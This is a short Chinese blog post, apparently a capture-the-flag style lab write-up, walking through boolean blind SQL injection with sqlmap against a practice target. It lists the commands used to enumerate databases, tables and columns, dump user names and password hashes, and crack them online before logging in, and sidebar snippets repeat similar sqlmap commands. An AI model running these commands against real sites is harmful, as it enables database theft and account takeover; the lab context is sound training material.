学习kali下salmap的使用-———boole盲注测试

最新推荐文章于 2023-08-05 21:32:08 发布
最新推荐文章于 2023-08-05 21:32:08 发布
阅读量678 收藏 3
点赞数
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sushing/article/details/108217174
版权

1.1.查看帮助和参数:
在这里插入图片描述
2.先找注入点:点击登录下面的关于平台停机公告的通知滚动栏
在这里插入图片描述
3.来到如下页面
在这里插入图片描述
4.修改url,设置and 1 = 2 报错找到注入点
在这里插入图片描述
5.使用命令 sqlmap -u http://219.153.49.228:48953/new_list.php?id=1 得到数据库为Mysql

在这里插入图片描述
6.输入sqlmap -u http://219.153.49.228:48953/new_list.php?id=1 -dbs查看数据库
在这里插入图片描述
7.查看数据表:qlmap -u http://219.153.49.228:48953/new_list.php?id=1 -tables -D stormgroup
在这里插入图片描述
8.查字段:sqlmap -u http://219.153.49.228:48953/new_list.php?id=1 -columns -T member -D stormgroup
在这里插入图片描述
9.查字段的值sqlmap -u http://219.153.49.228:48953/new_list.php?id=1 -dump -C name -T member -D stormgroup

在这里插入图片描述
在这里插入图片描述
10.得用户名和加密密码,需要到https://cmd5.com/网站解密
在这里插入图片描述
11.登录
在这里插入图片描述
12.拿到key
在这里插入图片描述

sushing
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
sqlmap 盲注使用
devil8123665的博客
04-17 6820
sql盲注 sqlmap.py -u "http://192.168.190.159/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=vdc32duqf2vlc92tepq3fvfp70" --technique B --dbs --batch 通过上文...
salmap测试工具
07-13
sqlmap工具,是针对链接地址中存在的漏洞,进行分布式爆破测试,检测出存在的漏洞!进行针对性的修改
布尔盲注
printfzfy的博客
12-07 252
打开靶场 点击访问 工具用sqlmap,一般kali虚拟机自带 1:在命令行里输入: sqlmap -u 注入点 --current-db 点回车键会出现 数据库名是 stormgroup 只有出现这个数据库才可执行下个命令 sqlmap -u 注入点-D 获取到的数据名 --tables 会有member和notice 就是下图 3: 获取完之后sqlmap -u 注入点 -D 获取到的数据库...
墨者学院SQL注入漏洞测试(布尔盲注)
kugaigao_的博客
12-06 273
点击链接 点击下方‘关于平台停机维护的通知’ 打开kali中的sqlmap输入 sqlmap -u http://219.153.49.228:45316/new_list.php?id=1 --current-db 得到数据库名stormgroup sqlmap -u 219.153.49.228:45316/new_list.php?id=1 -D stormgroup --tables 获...
Sqlmap使用-盲注小实验
weixin_50339832的博客
06-03 5897
sqlmap简介 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。 4、联合查询注入,可以使用union的情况下的注入。 5、堆查询注入,可以同时执行多条语句的执行时的注入。 ...
salmap通关sql-labs学习笔记
qq_43641876的博客
11-19 582
sql注入学习笔记输出1
kali-linux-wireless-pentest_kali使用指南_productg6t_kali_kali-linux-
10-01
kali Linux详细指南,后续在更新
kali系统-工具-中文手册-html版
07-15
Kali Linux Tools 中文說明書 nmap包说明 NMAP(“网络映射”)是一个自由和开放源码(许可证)工具进行网络发现和安全审计。许多系统和网络管理员也觉得有用,如网络库存,管理服务升级计划和监控主机或服务的正常...
kali-linux-2021.3-installer-amd64.part4.rar
09-29
kali-linux-2021.3-installer-amd64.iso适用于X64位系统,文件分割成 5个 压缩包,必须集齐5个 文件后才能一起解压一起使用kali-linux-2021.3-installer-amd64.part5.rar ... kali-linux-2021.3-installer-amd64....
kali-linux-2023.3-vmware-amd64.part1.rar
10-13
kali-linux-2023.3(kali-linux-2023.3-vmware-amd64.7z)适用于VMware系统,文件使用WinRAR分割成四个压缩包,必须一起下载使用: 文件1:https://download.csdn.net/download/weixin_43800734/88423344 文件2:...
最新的sqlmap-sqlmap
01-18
sqlmap用于自动化的sql注入。sqlmap用于自动化的sql注入。sqlmap用于自动化的sql注入。sqlmap用于自动化的sql注入。sqlmap用于自动化的sql注入。sqlmap用于自动化的sql注入。sqlmap用于自动化的sql注入。sqlmap用于自动化的sql注入。sqlmap用于自动化的sql注入。sqlmap用于自动化的sql注入。sqlmap用于自动化的sql注入。sqlmap用于自动化的sql注入。
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part1.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
SQLMAP
Unitue_逆流
03-14 306
SQL分类:   按照数据类型分:       整型注入、字符型注入   按照注入语法分类:      UNION query SQL injection(可联合查询注入)      Error-based SQL injection(报错性注入)      Boolean-based blind SQL injection(布尔型注入)     Time-based blind S
SQLMap
每天早起吃早餐
03-20 5871
概念 1. 什么是SQL注入?[1] SQL注入是一种代码注入技术,过去常常用于攻击数据驱动性的应用,比如将恶意的SQL代码注入到特定字段用于实施拖库攻击等。SQL注入的成功必须借助应用程序的安全漏洞,例如用户输入没有经过正确地过滤(针对某些特定字符串)或者没有特别强调类型的时候,都容易造成异常地执行SQL语句。SQL注入是网站渗透中最常用的攻击技术,但是其实SQL注入可以用来
渗透常用工具之SQLMap使用
qq_33168924的博客
08-28 643
SQLMap使用详解 0x01 SALMap的简单介绍 0x02 SQLMap的安装 0x03 SQLMap使用 A) 常规使用 B)高级参数使用 C)自带绕过模块tamper的使用
网络安全学习笔记——SalMap爆破&添加快捷方式
just do it
08-05 473
python在cmd显示不是内部或外部命令,以及python貌似正常,但是pip不正常时——在系统变量里重新设置或添加path变量,添加内容为python的安装路径,精确到.ex。sqlmap损坏时,在官网重新下载一个文件,放到电脑里,根据。
史上最详细的sqlmap使用教程
热门推荐
大河之犬的博客
09-19 4万+
sqlmapsqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQL、SQL Server、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等Sqlmap采用了以下5种独特的SQL注入技术基于布尔类型的盲注,即可以根据返回页面判断条件真假的注入。
SQL注入的本质
鱼的博客
07-27 1552
SQL注入的本质 注入攻击的本质: 把用户输入的数据当做代码执行。 两个关键条件: 第一个是用户能够控制输入 第二个是原本程序要执行的代码,拼接了用户输入的数据然后进行执行 针对SQL语句的注入,也可以理解为用户输入的数据当做SQL语句的代码执行 显错注入-联合查询(Mysql数据库)的基本流程 重要知识点: 通过系统自带库查询数据 通过系统自带库查询数据 Mysql在5.0以上版本加入了information_schema 这个系统自带库 其中保存着关于MySQL服务器所维护的所有其他数据库的信息
docker save kalilinux/kali-rolling > kalilinux
最新发布
06-21
在Docker中,`docker save`命令用于将镜像导出为tar文件,而`kalilinux/kali-rolling`是你想要保存的具体镜像名称。命令`docker save kalilinux/kali-rolling > kalilinux`的意思是: 1. `docker save`: 运行Docker save命令,准备将kalilinux/kali-rolling这个镜像导出。 2. `kalilinux/kali-rolling`: 指定要导出的镜像名,这里是Kali Linux的滚动更新版本(rolling)。 3. `> kalilinux`: 将导出的结果重定向到一个名为"kalilinux"的本地文件,这样就创建了一个tar归档文件,包含了镜像的所有内容。 这个操作通常用于备份镜像、分享镜像或者在不同环境中复用镜像。执行后,你将得到一个名为"kalilinux"的tar文件,其中包含了kalilinux/kali-rolling镜像的所有层和配置信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值